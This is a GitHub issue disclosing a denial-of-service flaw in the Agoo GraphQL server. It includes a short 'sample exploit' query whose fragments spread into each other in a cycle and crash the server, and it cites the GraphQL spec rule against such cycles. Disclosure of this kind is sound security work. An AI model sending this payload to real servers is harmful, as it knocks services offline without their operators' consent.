Skip to content

Agoo Fragment Cycle Security Vulnerability #109

New issue
New issue
Closed
Closed
Agoo Fragment Cycle Security Vulnerability#109
@nicholasaleks

Description

@nicholasaleks
nicholasaleks
opened on May 4, 2022

Agoo currently does not support request validations meaning cycle fragment requests lead to unbounded results causing instances of Agoo to crash.

Sample exploit script:

query test {
  __schema {
    ...A
  }
}

fragment A on __Schema {
	types {
    fields {
      name
    }
  }
  ...B
}

fragment B on __Schema {
	...A
}

For more information see: https://github.com/nicholasaleks/graphql-threat-matrix/blob/master/implementations/agoo.md

Spec ref: https://spec.graphql.org/October2021/#sec-Fragment-spreads-must-not-form-cycles

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions